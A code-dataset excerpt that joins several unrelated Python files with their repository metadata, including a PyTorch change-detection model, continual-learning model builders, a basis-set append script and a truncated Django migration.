] | 3 | 2021-12-12T09:45:41.000Z | 2022-03-10T08:34:22.000Z | models/sseg/base.py | lyp19/GAOFEN2021_CHANGEDETECTION | 5b7251cb1e951a04c7effacab6c1233232158472 | [
"MIT"
] | null | null | null | models/sseg/base.py | lyp19/GAOFEN2021_CHANGEDETECTION | 5b7251cb1e951a04c7effacab6c1233232158472 | [
"MIT"
] | 1 | 2021-11-13T05:40:18.000Z | 2021-11-13T05:40:18.000Z | from models.backbone.hrnet import HRNet
from models.backbone.resnet import resnet18, resnet34, resnet50, resnet101, resnet152, resnext50_32x4d, resnext101_32x8d
import torch
from torch import nn
import torch.nn.functional as F
from models.pointrend import PointHead
from models.block.attention import PAM_Module, CAM_Module
from efficientnet_pytorch import EfficientNet
def get_backbone(backbone, pretrained):
if backbone == "resnet18":
backbone = resnet18(pretrained)
elif backbone == "resnet34":
backbone = resnet34(pretrained)
elif backbone == "resnet50":
backbone = resnet50(pretrained)
elif backbone == "resnet101":
backbone = resnet101(pretrained)
elif backbone == "resnet152":
backbone = resnet152(pretrained)
elif backbone == "resnext50":
backbone = resnext50_32x4d(pretrained)
elif backbone == "resnext101":
backbone = resnext101_32x8d(pretrained)
elif "hrnet" in backbone:
backbone = HRNet(backbone, pretrained)
elif "efficientnet-b3":
backbone = EfficientNet.from_pretrained('efficientnet-b3')
else:
exit("\nError: BACKBONE \'%s\' is not implemented!\n" % backbone)
return backbone
# class BaseNet(nn.Module):
# def __init__(self, backbone, pretrained):
# super(BaseNet, self).__init__()
# self.backbone = get_backbone(backbone, pretrained)
# def base_forward(self, x1, x2):
# b, c, h, w = x1.shape
# x1 = self.backbone.base_forward(x1)[-1]
# x2 = self.backbone.base_forward(x2)[-1]
# out1 = self.head(x1)
# out2 = self.head(x2)
# out1 = F.interpolate(out1, size=(
# h, w), mode='bilinear', align_corners=False)
# out2 = F.interpolate(out2, size=(
# h, w), mode='bilinear', align_corners=False)
# out_bin = torch.abs(x1 - x2)
# out_bin = self.head_bin(out_bin)
# out_bin = F.interpolate(out_bin, size=(
# h, w), mode='bilinear', align_corners=False)
# out_bin = torch.softmax(out_bin)
# return out1, out2, out_bin.squeeze(1)
# def forward(self, x1, x2, tta=False):
# if not tta:
# return self.base_forward(x1, x2)
# else:
# out1, out2, out_bin = self.base_forward(x1, x2)
# out1 = F.softmax(out1, dim=1)
# out2 = F.softmax(out2, dim=1)
# out_bin = out_bin.unsqueeze(1)
# origin_x1 = x1.clone()
# origin_x2 = x2.clone()
# x1 = origin_x1.flip(2)
# x2 = origin_x2.flip(2)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(2)
# out2 += F.softmax(cur_out2, dim=1).flip(2)
# out_bin += cur_out_bin.unsqueeze(1).flip(2)
# x1 = origin_x1.flip(3)
# x2 = origin_x2.flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(3)
# out2 += F.softmax(cur_out2, dim=1).flip(3)
# out_bin += cur_out_bin.unsqueeze(1).flip(3)
# x1 = origin_x1.transpose(2, 3).flip(3)
# x2 = origin_x2.transpose(2, 3).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(3).transpose(2, 3)
# out2 += F.softmax(cur_out2, dim=1).flip(3).transpose(2, 3)
# out_bin += cur_out_bin.unsqueeze(1).flip(3).transpose(2, 3)
# x1 = origin_x1.flip(3).transpose(2, 3)
# x2 = origin_x2.flip(3).transpose(2, 3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).transpose(2, 3).flip(3)
# out2 += F.softmax(cur_out2, dim=1).transpose(2, 3).flip(3)
# out_bin += cur_out_bin.unsqueeze(1).transpose(2, 3).flip(3)
# x1 = origin_x1.flip(2).flip(3)
# x2 = origin_x2.flip(2).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(3).flip(2)
# out2 += F.softmax(cur_out2, dim=1).flip(3).flip(2)
# out_bin += cur_out_bin.unsqueeze(1).flip(3).flip(2)
# out1 /= 6.0
# out2 /= 6.0
# out_bin /= 6.0
# return out1, out2, out_bin.squeeze(1)
# class BaseNet(nn.Module):
# def __init__(self, backbone, pretrained):
# super(BaseNet, self).__init__()
# self.backbone = get_backbone(backbone, pretrained)
# def base_forward(self, x1, x2):
# b, c, h, w = x1.shape
# # TODO 改动,直接输入二者的差值
# x_bin = x2-x1
# # backbone提取特征
# x1 = self.backbone.base_forward(x1)[-1]
# x2 = self.backbone.base_forward(x2)[-1]
# # head输出
# out1 = self.head(x1)
# out2 = self.head(x2)
# # 上采样至原图像大小
# out1 = F.interpolate(out1, size=(
# h, w), mode='bilinear', align_corners=False)
# out2 = F.interpolate(out2, size=(
# h, w), mode='bilinear', align_corners=False)
# # softmax输出
# out1 = torch.softmax(out1)
# out2 = torch.softmax(out2)
# # 输出change,并上采样
# out_bin = torch.abs(x1 - x2)
# out_bin = self.head_bin(out_bin)
# out_bin = F.interpolate(out_bin, size=(
# h, w), mode='bilinear', align_corners=False)
# # softmax输出
# out_bin = torch.softmax(out_bin)
# return out1, out2, out_bin
# def forward(self, x1, x2, tta=False):
# # 不加TTA
# if not tta:
# # 调用子类的base_forward方法
# return self.base_forward(x1, x2)
# # 加TTA
# else:
# # 原图像输出
# out1, out2, out_bin = self.base_forward(x1, x2)
# # 原图像
# origin_x1 = x1.clone()
# origin_x2 = x2.clone()
# # 对dim=2翻转后输出
# x1 = origin_x1.flip(2)
# x2 = origin_x2.flip(2)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# # 叠加输出
# out1 += cur_out1.flip(2)
# out2 += cur_out2.flip(2)
# out_bin += cur_out_bin.flip(2)
# # 对dim=3翻转后输出
# x1 = origin_x1.flip(3)
# x2 = origin_x2.flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += cur_out1.flip(3)
# out2 += cur_out2.flip(3)
# out_bin += cur_out_bin.flip(3)
# # 换轴再翻转
# x1 = origin_x1.transpose(2, 3).flip(3)
# x2 = origin_x2.transpose(2, 3).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += cur_out1.flip(3).transpose(2, 3)
# out2 += cur_out2.flip(3).transpose(2, 3)
# out_bin += cur_out_bin.flip(3).transpose(2, 3)
# # 翻转再换轴
# x1 = origin_x1.flip(3).transpose(2, 3)
# x2 = origin_x2.flip(3).transpose(2, 3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += cur_out1.transpose(2, 3).flip(3)
# out2 += cur_out2.transpose(2, 3).flip(3)
# out_bin += cur_out_bin.transpose(2, 3).flip(3)
# # 同时翻转dim=2和dim=3
# x1 = origin_x1.flip(2).flip(3)
# x2 = origin_x2.flip(2).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += cur_out1.flip(3).flip(2)
# out2 += cur_out2.flip(3).flip(2)
# out_bin += cur_out_bin.flip(3).flip(2)
# # 计算TTA输出均值
# out1 /= 6.0
# out2 /= 6.0
# out_bin /= 6.0
# return out1, out2, out_bin
# ***************************backone==resnet****************************
class BaseNet(nn.Module):
def __init__(self, backbone, pretrained):
super(BaseNet, self).__init__()
self.backbone = get_backbone(backbone, pretrained)
def base_forward(self, x1, x2):
b, c, h, w = x1.shape
# backbone提取双时相特征
features1 = self.backbone.base_forward(x1)
features2 = self.backbone.base_forward(x2)
# 输出change,并上采样
out_bin = torch.abs(features2[-1] - features1[-1])
out_bin = self.head(out_bin)
out_bin = F.interpolate(out_bin, size=(
h, w), mode='bilinear', align_corners=True)
# out_bin = torch.softmax(out_bin, dim=1)
return out_bin
def forward(self, x1, x2, tta=False):
# 不加TTA
if not tta:
# 调用子类的base_forward方法
return self.base_forward(x1, x2)
# 加TTA
else:
# 原图像输出
out1, out2, out_bin = self.base_forward(
x1, x2)
# 原图像
origin_x1 = x1.clone()
origin_x2 = x2.clone()
# 对dim=2翻转后输出
x1 = origin_x1.flip(2)
x2 = origin_x2.flip(2)
cur_out1, cur_out2, cur_out_bin = self.base_forward(
x1, x2)
# 叠加输出
out1 += cur_out1.flip(2)
out2 += cur_out2.flip(2)
out_bin += cur_out_bin.flip(2)
# 对dim=3翻转后输出
x1 = origin_x1.flip(3)
x2 = origin_x2.flip(3)
cur_out1, cur_out2, cur_out_bin = self.base_forward(
x1, x2)
out1 += cur_out1.flip(3)
out2 += cur_out2.flip(3)
out_bin += cur_out_bin.flip(3)
# 换轴再翻转
x1 = origin_x1.transpose(2, 3).flip(3)
x2 = origin_x2.transpose(2, 3).flip(3)
cur_out1, cur_out2, cur_out_bin = self.base_forward(
x1, x2)
out1 += cur_out1.flip(3).transpose(2, 3)
out2 += cur_out2.flip(3).transpose(2, 3)
out_bin += cur_out_bin.flip(3).transpose(2, 3)
# 翻转再换轴
x1 = origin_x1.flip(3).transpose(2, 3)
x2 = origin_x2.flip(3).transpose(2, 3)
cur_out1, cur_out2, cur_out_bin = self.base_forward(
x1, x2)
out1 += cur_out1.transpose(2, 3).flip(3)
out2 += cur_out2.transpose(2, 3).flip(3)
out_bin += cur_out_bin.transpose(2, 3).flip(3)
# 同时翻转dim=2和dim=3
x1 = origin_x1.flip(2).flip(3)
x2 = origin_x2.flip(2).flip(3)
cur_out1, cur_out2, cur_out_bin = self.base_forward(
x1, x2)
out1 += cur_out1.flip(3).flip(2)
out2 += cur_out2.flip(3).flip(2)
out_bin += cur_out_bin.flip(3).flip(2)
# 计算TTA输出均值
out1 /= 6.0
out2 /= 6.0
out_bin /= 6.0
return out1, out2, out_bin
# ***************************backone==resnet***************************
# class BaseNet(nn.Module):
# def __init__(self, backbone, pretrained):
# super(BaseNet, self).__init__()
# # self.sa = PAM_Module(1536).cuda()
# # self.sc = CAM_Module(1536).cuda()
# self.backbone = get_backbone(backbone, pretrained)
# self.point_head = PointHead(in_c=1538)
# def base_forward(self, x1, x2):
# b, c, h, w = x1.shape
# # backbone提取特征
# features1 = self.backbone.base_forward(x1)
# features2 = self.backbone.base_forward(x2)
# # sa1 = self.sa(features1)
# # sc1 = self.sc(features1)
# # sa2 = self.sa(features2)
# # sc2 = self.sc(features2)
# # features1 = sa1 + sc1
# # features2 = sa2 + sc2
# # head输出
# out1 = self.head(features1)
# out2 = self.head(features2)
# out_point1 = self.point_head(x1, features1, out1)
# out_point2 = self.point_head(x2, features2, out2)
# # 上采样至原图像大小
# out1 = F.interpolate(out1, size=(
# h, w), mode='bilinear', align_corners=False)
# out2 = F.interpolate(out2, size=(
# h, w), mode='bilinear', align_corners=False)
# # softmax输出
# out1 = torch.softmax(out1, dim=1)
# out2 = torch.softmax(out2, dim=1)
# # 输出change,并上采样
# out_bin = torch.abs(features2 - features1)
# out_bin = self.head_bin(out_bin)
# out_bin = F.interpolate(out_bin, size=(
# h, w), mode='bilinear', align_corners=False)
# out_bin = torch.softmax(out_bin, dim=1)
# return out1, out2, out_bin
# def forward(self, x1, x2, tta=False):
# # 不加TTA
# if not tta:
# # 调用子类的base_forward方法
# return self.base_forward(x1, x2)
# # 加TTA
# else:
# # 原图像输出
# out1, out2, out_bin = self.base_forward(
# x1, x2)
# # 原图像
# origin_x1 = x1.clone()
# origin_x2 = x2.clone()
# # 对dim=2翻转后输出
# x1 = origin_x1.flip(2)
# x2 = origin_x2.flip(2)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(
# x1, x2)
# # 叠加输出
# out1 += cur_out1.flip(2)
# out2 += cur_out2.flip(2)
# out_bin += cur_out_bin.flip(2)
# # 对dim=3翻转后输出
# x1 = origin_x1.flip(3)
# x2 = origin_x2.flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(
# x1, x2)
# out1 += cur_out1.flip(3)
# out2 += cur_out2.flip(3)
# out_bin += cur_out_bin.flip(3)
# # 换轴再翻转
# x1 = origin_x1.transpose(2, 3).flip(3)
# x2 = origin_x2.transpose(2, 3).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(
# x1, x2)
# out1 += cur_out1.flip(3).transpose(2, 3)
# out2 += cur_out2.flip(3).transpose(2, 3)
# out_bin += cur_out_bin.flip(3).transpose(2, 3)
# # 翻转再换轴
# x1 = origin_x1.flip(3).transpose(2, 3)
# x2 = origin_x2.flip(3).transpose(2, 3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(
# x1, x2)
# out1 += cur_out1.transpose(2, 3).flip(3)
# out2 += cur_out2.transpose(2, 3).flip(3)
# out_bin += cur_out_bin.transpose(2, 3).flip(3)
# # 同时翻转dim=2和dim=3
# x1 = origin_x1.flip(2).flip(3)
# x2 = origin_x2.flip(2).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(
# x1, x2)
# out1 += cur_out1.flip(3).flip(2)
# out2 += cur_out2.flip(3).flip(2)
# out_bin += cur_out_bin.flip(3).flip(2)
# # 计算TTA输出均值
# out1 /= 6.0
# out2 /= 6.0
# out_bin /= 6.0
# return out1, out2, out_bin
| 35.793269 | 120 | 0.525252 | 1,919 | 14,890 | 3.875456 | 0.067223 | 0.085518 | 0.048407 | 0.064004 | 0.817937 | 0.814576 | 0.800592 | 0.782708 | 0.771144 | 0.75837 | 0 | 0.07555 | 0.334184 | 14,890 | 415 | 121 | 35.879518 | 0.674602 | 0.695635 | 0 | 0.144444 | 0 | 0 | 0.035495 | 0 | 0 | 0 | 0 | 0.00241 | 0 | 1 | 0.044444 | false | 0 | 0.088889 | 0 | 0.188889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
77daa37ae75aab16ca51397f20c8860614522dac | 124 | py | Python | game/game/event.py | maosplx/L2py | 5d81b2ea150c0096cfce184706fa226950f7f583 | [
"MIT"
] | 7 | 2020-09-01T21:52:37.000Z | 2022-02-25T16:00:08.000Z | game/game/event.py | maosplx/L2py | 5d81b2ea150c0096cfce184706fa226950f7f583 | [
"MIT"
] | 4 | 2021-09-10T22:15:09.000Z | 2022-03-25T22:17:43.000Z | game/game/event.py | maosplx/L2py | 5d81b2ea150c0096cfce184706fa226950f7f583 | [
"MIT"
] | 9 | 2020-09-01T21:53:39.000Z | 2022-03-30T12:03:04.000Z | from dataclasses import dataclass
from common import BaseDataclass
@dataclass
class ServerEvent(BaseDataclass):
pass
| 13.777778 | 33 | 0.814516 | 13 | 124 | 7.769231 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153226 | 124 | 8 | 34 | 15.5 | 0.961905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
7acd80ea5ead306c357e27b55b3f9952aeca4869 | 27 | py | Python | radforest/geometry/__init__.py | argram30/RadForest | 585ba9dfd83dd2775ae4ef3c24c32be10d8aa88d | [
"MIT"
] | 4 | 2018-02-04T19:04:01.000Z | 2022-02-09T04:11:18.000Z | radforest/geometry/__init__.py | argram30/RadForest | 585ba9dfd83dd2775ae4ef3c24c32be10d8aa88d | [
"MIT"
] | 21 | 2017-08-15T21:13:42.000Z | 2021-12-23T20:07:24.000Z | radforest/geometry/__init__.py | argram30/RadForest | 585ba9dfd83dd2775ae4ef3c24c32be10d8aa88d | [
"MIT"
] | 1 | 2021-01-28T18:29:12.000Z | 2021-01-28T18:29:12.000Z | from .sphere import Sphere
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7ad5d50db314c16ca28ca059efd0e369fa13b39b | 11,646 | py | Python | define_models.py | miladkhademinori/class-incremental-learning | 21dd41d31dea1dfafb1e8d90d7f0a1be6b1c6e66 | [
"MIT"
] | 33 | 2021-04-21T10:24:08.000Z | 2022-03-20T14:59:50.000Z | define_models.py | Bethhhh/class-incremental-learning | 21dd41d31dea1dfafb1e8d90d7f0a1be6b1c6e66 | [
"MIT"
] | null | null | null | define_models.py | Bethhhh/class-incremental-learning | 21dd41d31dea1dfafb1e8d90d7f0a1be6b1c6e66 | [
"MIT"
] | 8 | 2021-05-08T23:33:37.000Z | 2021-12-13T07:31:43.000Z | import utils
from utils import checkattr
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining auto-encoder model
def define_vae_classifier(args, config, device, depth=0):
# -import required model
from models.vae_with_classifier import AutoEncoder
# -create model
if depth > 0:
model = AutoEncoder(
image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
# -conv-layers
conv_type=args.conv_type, depth=depth, start_channels=args.channels, reducing_layers=args.rl,
num_blocks=args.n_blocks, conv_bn=True if args.conv_bn == "yes" else False, conv_nl=args.conv_nl,
global_pooling=checkattr(args, 'gp'),
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
fc_drop=args.fc_drop, fc_bn=True if args.fc_bn == "yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
# -prior
prior=args.prior if hasattr(args, "prior") else "standard",
n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
per_class=args.per_class if hasattr(args, "prior") else False,
# -decoder
recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment == "MNIST" else "none",
deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
dg_gates=utils.checkattr(args, 'dg_gates'), device=device,
dg_prop=args.dg_prop if hasattr(args, 'dg_prop') else 0.,
# -classifier
classifier=True, classify_opt=args.classify if hasattr(args, "classify") else "beforeZ", lamda_pl=1.
).to(device)
else:
model = AutoEncoder(
image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
fc_drop=args.fc_drop, fc_bn=True if args.fc_bn == "yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
# -prior
prior=args.prior if hasattr(args, "prior") else "standard",
n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
per_class=args.per_class if hasattr(args, "prior") else False,
# -decoder
recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment == "MNIST" else "none",
deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
dg_gates=utils.checkattr(args, 'dg_gates'), device=device,
dg_prop=args.dg_prop if hasattr(args, 'dg_prop') else 0.,
# -classifier
classifier=True, classify_opt=args.classify if hasattr(args, "classify") else "beforeZ", lamda_pl=1.,
).to(device)
# -return model
return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining auto-encoder model
def define_autoencoder(args, config, device, depth=0):
# -import required model
from models.vae import AutoEncoder
# -create model
if depth > 0:
model = AutoEncoder(
image_size=config['size'], image_channels=config['channels'],
# -conv-layers
conv_type=args.conv_type, depth=depth, start_channels=args.channels, reducing_layers=args.rl,
num_blocks=args.n_blocks, conv_bn=True if args.conv_bn=="yes" else False, conv_nl=args.conv_nl,
global_pooling=False, no_fnl=True if args.conv_type=="standard" else False,
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
# -prior
prior=args.prior if hasattr(args, "prior") else "standard",
n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
# -decoder
recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=="MNIST" else "none",
deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
).to(device)
else:
model = AutoEncoder(
image_size=config['size'], image_channels=config['channels'],
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
# -prior
prior=args.prior if hasattr(args, "prior") else "standard",
n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
# -decoder
recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=="MNIST" else "none",
deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
).to(device)
# -return model
return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining feature extractor model
def define_feature_extractor(args, config, device):
# -import required model
from models.feature_extractor import FeatureExtractor
# -create model
model = FeatureExtractor(
image_size=config['size'], image_channels=config['channels'],
# -conv-layers
conv_type=args.conv_type, depth=args.depth, start_channels=args.channels, reducing_layers=args.rl,
num_blocks=args.n_blocks, conv_bn=True if args.conv_bn=="yes" else False, conv_nl=args.conv_nl,
global_pooling=checkattr(args, 'gp'),
).to(device)
# -return model
return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining SLDA model
def define_slda(args, num_features, classes, device='cpu'):
from models.slda import StreamingLDA
# -create model
classifier = StreamingLDA(
num_features=num_features, classes=classes,
# -slda parameters
epsilon=1e-4, device=device, covariance=args.covariance if hasattr(args, 'covariance') else "identity",
).to(device)
return classifier
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining classifier model
def define_classifier(args, config, device, no_fnl_fc=False, depth=0):
# -import required model
from models.classifier import Classifier
# -create model
if depth > 0:
model = Classifier(
image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
# -conv-layers
conv_type=args.conv_type, depth=depth, start_channels=args.channels, reducing_layers=args.rl,
num_blocks=args.n_blocks, conv_bn=True if args.conv_bn=="yes" else False, conv_nl=args.conv_nl,
global_pooling=checkattr(args, 'gp'), no_fnl=True if args.conv_type=="standard" else False,
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim, no_fnl_fc=no_fnl_fc,
fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
# -training related parameters
neg_samples=args.neg_samples if hasattr(args, "neg_samples") else "all",
classes_per_task=config['classes_per_task'] if hasattr(args, "tasks") else None
).to(device)
else:
model = Classifier(
image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim, no_fnl_fc=no_fnl_fc,
fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
# -training related parameters
neg_samples=args.neg_samples if hasattr(args, "neg_samples") else "all",
classes_per_task=config['classes_per_task'] if hasattr(args, "tasks") else None
).to(device)
# -return model
return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining auto-encoder model
def define_gen_classifer(args, config, device, convE=None, depth=0):
# -import required model
from models.gen_classsifier import GenClassifier
# -create model
if depth > 0:
model = GenClassifier(
image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
# -conv-layers
conv_type=args.conv_type, depth=depth,
start_channels=args.channels, reducing_layers=args.rl, conv_bn=(args.conv_bn=="yes"), conv_nl=args.conv_nl,
num_blocks=args.n_blocks, convE=convE, global_pooling=checkattr(args, 'gp'),
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
fc_drop=args.fc_drop, fc_bn=(args.fc_bn=="yes"), fc_nl=args.fc_nl, excit_buffer=True,
# -prior
prior=args.prior, n_modes=args.n_modes, z_dim=args.z_dim,
# -decoder
recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=='MNIST' else "none",
deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
).to(device)
else:
model = GenClassifier(
image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
# -fc-layers
fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
fc_drop=args.fc_drop, fc_bn=(args.fc_bn=="yes"), fc_nl=args.fc_nl, excit_buffer=True,
# -prior
prior=args.prior, n_modes=args.n_modes, z_dim=args.z_dim,
# -decoder
recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=='MNIST' else "none",
deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
).to(device)
# -return model
return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for (re-)initializing the parameters of [model]
def init_params(model, args):
# - reinitialize all parameters according to default initialization
model.apply(utils.weight_reset)
# - initialize parameters according to chosen custom initialization (if requested)
if hasattr(args, 'init_weight') and not args.init_weight=="standard":
utils.weight_init(model, strategy="xavier_normal")
if hasattr(args, 'init_bias') and not args.init_bias=="standard":
utils.bias_init(model, strategy="constant", value=0.01)
# - use pre-trained weights in conv-layers?
if utils.checkattr(args, "pre_convE") and hasattr(model, 'depth') and model.depth>0:
load_name = model.convE.name if (
not hasattr(args, 'convE_ltag') or args.convE_ltag=="none"
) else "{}-{}".format(model.convE.name, args.convE_ltag)
utils.load_checkpoint(model.convE, model_dir=args.m_dir, name=load_name)
return model
##-------------------------------------------------------------------------------------------------------------------## | 53.668203 | 119 | 0.603469 | 1,480 | 11,646 | 4.531757 | 0.100676 | 0.035784 | 0.052333 | 0.017892 | 0.798867 | 0.789175 | 0.78351 | 0.773073 | 0.766513 | 0.758014 | 0 | 0.00238 | 0.206423 | 11,646 | 217 | 120 | 53.668203 | 0.723328 | 0.173794 | 0 | 0.720588 | 0 | 0 | 0.079135 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051471 | false | 0 | 0.058824 | 0 | 0.161765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb2f2780686f146e56e28a9a44b5dcd3a31cb92f | 865 | py | Python | basis_set_append/append.py | JorgeG94/useful_tools | 50a085a4aa48fe435f6b9fa8bef44d74c220f289 | [
"MIT"
] | null | null | null | basis_set_append/append.py | JorgeG94/useful_tools | 50a085a4aa48fe435f6b9fa8bef44d74c220f289 | [
"MIT"
] | null | null | null | basis_set_append/append.py | JorgeG94/useful_tools | 50a085a4aa48fe435f6b9fa8bef44d74c220f289 | [
"MIT"
] | null | null | null | from basis import *
import fileinput
import sys
file = sys.argv[1]
for line in fileinput.FileInput(file,inplace=1):
if "C 6.0" in line:
line = line.replace(line,line+carbon_sto3g_basis)
print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
if "H 1.0" in line:
line = line.replace(line,line+hydrogen_sto3g_basis)
print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
if "O 8.0" in line:
line = line.replace(line,line+oxygen_sto3g_basis)
print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
if "W 74.0" in line:
line = line.replace(line,line+tungsten_basis)
print(line, end='')
for line in fileinput.FileInput(file, inplace=1):
if "P 15.0" in line:
line = line.replace(line,line+phosphorus_sto3g_basis)
print(line, end='')
| 27.903226 | 58 | 0.65896 | 135 | 865 | 4.155556 | 0.237037 | 0.213904 | 0.080214 | 0.160428 | 0.819964 | 0.780749 | 0.780749 | 0.780749 | 0.513369 | 0.440285 | 0 | 0.032117 | 0.208092 | 865 | 30 | 59 | 28.833333 | 0.786861 | 0 | 0 | 0.416667 | 0 | 0 | 0.053892 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.208333 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb4e4b7a59c3436e9e78c08338a7ace017a89c47 | 4,179 | py | Python | api/migrations/0001_initial.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | api/migrations/0001_initial.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | 3 | 2020-08-25T18:19:42.000Z | 2022-02-13T19:39:19.000Z | api/migrations/0001_initial.py | KamilJakubczak/budget-api | b1c602b38183b46d09b267a3b848d3dcf5d293c6 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-08-17 20:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
